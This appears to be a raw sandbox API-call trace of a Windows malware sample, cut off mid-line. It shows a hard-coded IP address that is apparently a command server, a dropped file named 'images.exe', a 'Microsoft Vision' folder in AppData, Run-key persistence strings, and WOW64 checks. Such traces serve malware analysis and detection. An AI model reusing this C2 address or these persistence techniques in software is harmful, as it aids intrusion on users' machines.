[0268.361] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1ca) returned 0x7704e8 [0268.361] GetProcessHeap () returned 0x710000 [0268.362] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7708f8 | out: hHeap=0x710000) returned 1 [0268.362] GetProcessHeap () returned 0x710000 [0268.362] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1ca) returned 0x7708f8 [0268.362] GetProcessHeap () returned 0x710000 [0268.362] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x725858 [0268.362] GetProcessHeap () returned 0x710000 [0268.362] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x725218 [0268.362] GetProcessHeap () returned 0x710000 [0268.363] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725858 | out: hHeap=0x710000) returned 1 [0268.363] GetProcessHeap () returned 0x710000 [0268.363] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x725858 [0268.363] GetProcessHeap () returned 0x710000 [0268.363] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725218 | out: hHeap=0x710000) returned 1 [0268.364] GetProcessHeap () returned 0x710000 [0268.364] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x725218 [0268.364] GetProcessHeap () returned 0x710000 [0268.364] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1ca) returned 0x7782f0 [0268.364] GetProcessHeap () returned 0x710000 [0268.364] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1ca) returned 0x7784c8 [0268.364] GetProcessHeap () returned 0x710000 [0268.365] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7782f0 | out: hHeap=0x710000) returned 1 [0268.365] GetProcessHeap () returned 0x710000 [0268.365] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725218 | out: hHeap=0x710000) returned 1 [0268.365] GetProcessHeap () returned 0x710000 [0268.365] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7708f8 | out: hHeap=0x710000) returned 1 [0268.365] GetProcessHeap () returned 0x710000 [0268.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7704e8 | out: hHeap=0x710000) returned 1 [0268.366] GetProcessHeap () returned 0x710000 [0268.366] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1e) returned 0x731168 [0268.366] lstrlenW (lpString="23.227.202.157") returned 14 [0268.366] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0268.366] lstrlenW (lpString="23.227.202.157") returned 14 [0268.366] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0268.366] lstrlenW (lpString="23.227.202.157") returned 14 [0268.366] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.367] lstrcpyW (in: lpString1=0x3620000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0268.367] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.367] GetProcessHeap () returned 0x710000 [0268.368] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x731168 | out: hHeap=0x710000) returned 1 [0268.368] lstrlenW (lpString="23.227.202.157") returned 14 [0268.372] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0268.372] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0268.372] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.373] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0268.374] GetProcessHeap () returned 0x710000 [0268.374] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x16) returned 0x72b4f8 [0268.374] lstrlenW (lpString="images.exe") returned 10 [0268.374] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.375] lstrlenW (lpString="images.exe") returned 10 [0268.375] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0268.375] lstrlenW (lpString="images.exe") returned 10 [0268.375] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0268.375] lstrcpyW (in: lpString1=0x3630000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0268.375] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.376] GetProcessHeap () returned 0x710000 [0268.376] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72b4f8 | out: hHeap=0x710000) returned 1 [0268.376] lstrlenW (lpString="images.exe") returned 10 [0268.376] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0268.376] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0268.376] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.377] GetProcessHeap () returned 0x710000 [0268.377] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xe) returned 0x733be8 [0268.377] lstrlenW (lpString="Images") returned 6 [0268.377] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0268.377] lstrlenW (lpString="Images") returned 6 [0268.377] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0268.377] lstrlenW (lpString="Images") returned 6 [0268.377] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0268.378] lstrcpyW (in: lpString1=0x3640000, lpString2="Images" | out: lpString1="Images") returned="Images" [0268.378] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.378] GetProcessHeap () returned 0x710000 [0268.378] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x733be8 | out: hHeap=0x710000) returned 1 [0268.379] lstrlenW (lpString="Images") returned 6 [0268.379] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0268.379] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0268.379] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.380] GetProcessHeap () returned 0x710000 [0268.380] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x16) returned 0x72b278 [0268.380] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.380] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0268.380] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.380] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0268.380] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.380] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0268.381] lstrcpyW (in: lpString1=0x3650000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0268.381] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.381] GetProcessHeap () returned 0x710000 [0268.381] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72b278 | out: hHeap=0x710000) returned 1 [0268.381] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.381] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0268.382] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0268.382] VirtualFree (lpAddress=0x3650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.382] GetProcessHeap () returned 0x710000 [0268.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7784c8 | out: hHeap=0x710000) returned 1 [0268.383] GetProcessHeap () returned 0x710000 [0268.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7702e0 | out: hHeap=0x710000) returned 1 [0268.383] GetProcessHeap () returned 0x710000 [0268.383] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7700d8 | out: hHeap=0x710000) returned 1 [0268.384] GetProcessHeap () returned 0x710000 [0268.384] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x740ac0 | out: hHeap=0x710000) returned 1 [0268.384] GetProcessHeap () returned 0x710000 [0268.384] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7754e8 | out: hHeap=0x710000) returned 1 [0268.384] GetProcessHeap () returned 0x710000 [0268.385] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x73f060 | out: hHeap=0x710000) returned 1 [0268.388] GetProcessHeap () returned 0x710000 [0268.388] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x770ae0 | out: hHeap=0x710000) returned 1 [0268.390] GetProcessHeap () returned 0x710000 [0268.391] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x749ec0 | out: hHeap=0x710000) returned 1 [0268.391] GetProcessHeap () returned 0x710000 [0268.391] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x749ab8 | out: hHeap=0x710000) returned 1 [0268.392] ReleaseMutex (hMutex=0x2b0) returned 0 [0268.392] CloseHandle (hObject=0x2b0) returned 1 [0268.392] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0268.392] GetProcessHeap () returned 0x710000 [0268.392] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x725218 [0268.392] lstrlenW (lpString="23.227.202.157") returned 14 [0268.392] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0268.392] lstrcpyW (in: lpString1=0x3650000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0268.392] lstrlenW (lpString="images.exe") returned 10 [0268.393] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3660000 [0268.393] lstrcpyW (in: lpString1=0x3660000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0268.393] lstrlenW (lpString="Images") returned 6 [0268.393] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3670000 [0268.393] lstrcpyW (in: lpString1=0x3670000, lpString2="Images" | out: lpString1="Images") returned="Images" [0268.393] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.393] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3680000 [0268.394] lstrcpyW (in: lpString1=0x3680000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0268.394] GetProcessHeap () returned 0x710000 [0268.394] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x73f060 [0268.394] GetCurrentProcess () returned 0xffffffff [0268.394] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xa0f894 | out: TokenHandle=0xa0f894*=0x2b0) returned 1 [0268.394] GetTokenInformation (in: TokenHandle=0x2b0, TokenInformationClass=0x14, TokenInformation=0xa0f88c, TokenInformationLength=0x4, ReturnLength=0xa0f890 | out: TokenInformation=0xa0f88c, ReturnLength=0xa0f890) returned 1 [0268.394] CloseHandle (hObject=0x2b0) returned 1 [0268.394] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0268.394] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0268.395] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0268.395] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0268.395] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0268.395] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0268.395] lstrcpyW (in: lpString1=0x36a0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0268.395] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.396] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.396] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0268.396] lstrcpyW (in: lpString1=0x3690000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0268.396] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.396] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0268.396] VirtualQuery (in: lpAddress=0x36a0000, lpBuffer=0xa0f84c, dwLength=0x1c | out: lpBuffer=0xa0f84c*(BaseAddress=0x36a0000, AllocationBase=0x36a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0268.396] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x36b0000 [0268.397] VirtualFree (lpAddress=0x36a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.397] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="L15UQINRPS" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS" [0268.397] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.398] lstrlenW (lpString="inst") returned 4 [0268.398] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0268.398] lstrlenW (lpString="inst") returned 4 [0268.398] lstrcpyW (in: lpString1=0x3690000, lpString2="inst" | out: lpString1="inst") returned="inst" [0268.398] lstrlenW (lpString="inst") returned 4 [0268.398] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0268.398] lstrcpyW (in: lpString1=0x36a0000, lpString2="inst" | out: lpString1="inst") returned="inst" [0268.398] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.399] lstrlenW (lpString="InitWindows") returned 11 [0268.399] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0268.401] lstrlenW (lpString="InitWindows") returned 11 [0268.401] lstrcpyW (in: lpString1=0x3690000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0268.401] lstrlenW (lpString="InitWindows") returned 11 [0268.401] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x36c0000 [0268.401] lstrcpyW (in: lpString1=0x36c0000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0268.401] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.402] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0268.402] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0268.402] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0268.402] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0268.402] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0268.402] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x36d0000 [0268.402] lstrcpyW (in: lpString1=0x36d0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0268.402] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0268.403] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", ulOptions=0x0, samDesired=0xf003f, phkResult=0xa0f950 | out: phkResult=0xa0f950*=0x0) returned 0x2 [0268.403] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0268.404] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2b0 [0268.404] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xa0fd1c | out: lpWSAData=0xa0fd1c) returned 0 [0268.404] GetProcessHeap () returned 0x710000 [0268.404] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x725318 [0268.404] lstrlenW (lpString="23.227.202.157") returned 14 [0268.404] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0268.404] lstrcpyW (in: lpString1=0x36e0000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0268.404] lstrlenW (lpString="images.exe") returned 10 [0268.404] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0268.404] lstrcpyW (in: lpString1=0x36f0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0268.405] lstrlenW (lpString="Images") returned 6 [0268.405] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3700000 [0268.405] lstrcpyW (in: lpString1=0x3700000, lpString2="Images" | out: lpString1="Images") returned="Images" [0268.405] lstrlenW (lpString="L15UQINRPS") returned 10 [0268.405] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3710000 [0268.405] lstrcpyW (in: lpString1=0x3710000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0268.405] GetProcessHeap () returned 0x710000 [0268.405] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x200) returned 0x73f268 [0268.405] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3720000 [0268.405] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xa0fad8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0268.409] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0268.409] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0268.409] GetCurrentProcess () returned 0xffffffff [0268.409] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xa0f8c4 | out: TokenHandle=0xa0f8c4*=0x2c4) returned 1 [0268.409] GetTokenInformation (in: TokenHandle=0x2c4, TokenInformationClass=0x14, TokenInformation=0xa0f8bc, TokenInformationLength=0x4, ReturnLength=0xa0f8c0 | out: TokenInformation=0xa0f8bc, ReturnLength=0xa0f8c0) returned 1 [0268.409] CloseHandle (hObject=0x2c4) returned 1 [0268.409] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77760000 [0268.409] GetProcAddress (hModule=0x77760000, lpProcName="RtlGetVersion") returned 0x777bdbb0 [0268.409] RtlGetVersion (in: lpVersionInformation=0xa0f7ac | out: lpVersionInformation=0xa0f7ac*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0268.409] GetCurrentProcess () returned 0xffffffff [0268.409] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xa0f268 | out: TokenHandle=0xa0f268*=0x2c4) returned 1 [0268.409] GetTokenInformation (in: TokenHandle=0x2c4, TokenInformationClass=0x14, TokenInformation=0xa0f260, TokenInformationLength=0x4, ReturnLength=0xa0f264 | out: TokenInformation=0xa0f260, ReturnLength=0xa0f264) returned 1 [0268.409] CloseHandle (hObject=0x2c4) returned 1 [0268.410] CloseHandle (hObject=0x2ac) returned 1 [0268.410] GetCurrentProcess () returned 0xffffffff [0268.410] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xa0f8c4 | out: Wow64Process=0xa0f8c4*=1) returned 1 [0268.410] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="ActivateActCtx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddAtomA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddAtomW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddDllDirectory", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddRefActCtx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AllocConsole", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AreFileApisANSI", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="AttachConsole", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.410] lstrcmpA (lpString1="BackupRead", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BackupSeek", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BackupWrite", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCheckElevation", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] 